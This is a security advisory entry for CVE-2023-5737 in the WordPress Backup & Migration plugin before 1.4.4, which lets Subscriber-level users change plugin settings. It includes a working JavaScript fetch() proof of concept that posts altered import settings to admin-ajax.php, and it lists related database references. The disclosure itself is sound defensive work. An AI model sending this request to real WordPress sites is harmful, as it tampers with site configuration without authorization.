Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:C761C67C-EAB8-4E1B-A332-C9A45E22BB13HistoryNov 06, 2023 - 12:00 a.m.
WordPress Backup & Migration < 1.4.4 - Subscriber+ Plugin Settings Update
2023-11-0600:00:00
Krzysztof Zając (CERT PL)
37
wordpress security
backup
migration
plugin
settings update
exploit
csrf
cors
Description The plugin does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
},
"body": "settings_data%5Bim_data_size_per_req%5D=100&settings_data%5Bim_db_file_per_req%5D=200&action=mgdp_plugin_save_import_settings",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Open http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import and click on Advanced Options to see the updated settings.Related
wpvulndb
wpvulndb
WordPress Backup & Migration < 1.4.4 - Subscriber+ Plugin Settings Update
2023-11-06 00:00:00
prion
prion
Design/Logic Flaw
2023-11-27 17:15:00
nvd
nvd
CVE-2023-5737
2023-11-27 17:15:09
cve
cve
CVE-2023-5737
2023-11-27 17:15:09
cvelist
cvelist
wordfence
wordfence
5.1 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
14.0%
Related for WPEX-ID:C761C67C-EAB8-4E1B-A332-C9A45E22BB13